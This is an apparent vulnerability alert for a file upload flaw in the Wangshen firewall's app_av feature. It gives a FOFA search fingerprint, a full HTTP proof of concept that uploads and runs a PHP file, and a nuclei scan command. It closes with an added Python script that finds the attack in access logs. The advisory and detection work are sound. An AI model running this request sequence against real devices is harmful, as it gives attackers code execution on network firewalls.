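0x02 Vulnerability Description
The app_av feature of the Wangshen (网神) firewall has a file upload vulnerability.
0x03 Vulnerability Reproduction
fofa:fid="1Lh1LHi6yfkhiO83I59AYg=="
1. Run the PoC to obtain a cookie, then upload a harmless file to get the result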
GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

POST /?g=app_av HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 440
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
Cookie: __s_sessionid__={{cookie}}
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="reqfile";filename="{{cookie}}.php"
Content-Type: text/plain

echo(md5(233));unlink(__FILE__);
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

app_av_import_save
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="certfile_r"

file
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

GET /attachements/{{cookie}}.php HTTP/1.1
Host:
Cookie: __s_sessionid__={{cookie}};
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2. The nuclei verification template has been published on Knowledge Planet (知识星球)
nuclei.exe -t wangshen-secgate-app_av-fileupload.yaml -l subs.txt -stats
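
To check whether a device has already seen this request sequence, the upload and follow-up fetch shown above can be hunted for in web access logs. The script below is an added example, not part of the original post or any vendor code; it assumes combined-format access logs from a proxy in front of the management interface, and the `triage` function and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Combined-log-style line; the format is an assumption, adapt it to your proxy/WAF.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
# Upload endpoint and served directory, spelled exactly as in the requests above.
UPLOAD_RE = re.compile(r'[?&]g=app_av(?:&|$)')
FETCH_RE = re.compile(r'^/attachements/[^/?]+\.(?:php\d?|phtml)(?:\?|$)', re.I)

# Constructed sample lines using documentation addresses, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:02 +0800] "GET / HTTP/1.1" 200 5120
198.51.100.7 - - [12/Mar/2024:10:01:03 +0800] "POST /?g=app_av HTTP/1.1" 200 312
198.51.100.7 - - [12/Mar/2024:10:01:04 +0800] "GET /attachements/0a1b2c3d.php HTTP/1.1" 200 32
203.0.113.20 - - [12/Mar/2024:10:05:00 +0800] "GET /attachements/logo.png HTTP/1.1" 200 901
203.0.113.21 - - [12/Mar/2024:10:06:00 +0800] "POST /?g=app_av HTTP/1.1" 302 0
192.0.2.9 - - [12/Mar/2024:10:07:00 +0800] "GET /attachements/x.PHP HTTP/1.1" 404 0
"""

def triage(log_text):
    """Map client IP -> 'high' (upload then script served with 200) or 'review'."""
    state = defaultdict(lambda: {"upload": False, "fetch": False, "served": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        s = state[m["ip"]]
        if m["method"] == "POST" and UPLOAD_RE.search(m["uri"]):
            s["upload"] = True
        elif m["method"] == "GET" and FETCH_RE.match(m["uri"]):
            s["fetch"] = True
            # A 200 for a script after an upload means the file landed and was served.
            s["served"] |= s["upload"] and m["status"] == "200"
    verdicts = {}
    for ip, s in state.items():
        if s["served"]:
            verdicts[ip] = "high"
        elif s["upload"] or s["fetch"]:
            verdicts[ip] = "review"
    return verdicts

if __name__ == "__main__":
    for ip, verdict in triage(SAMPLE_LOG).items():
        print(ip, verdict)
```

Because the test file in the requests above deletes itself after one execution, the uploaded file may no longer be on disk; the log pair is the more durable evidence.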
Originally published on the WeChat official account 融云攻防实验室: Vulnerability Alert: Wangshen Firewall app_av File Upload Vulnerability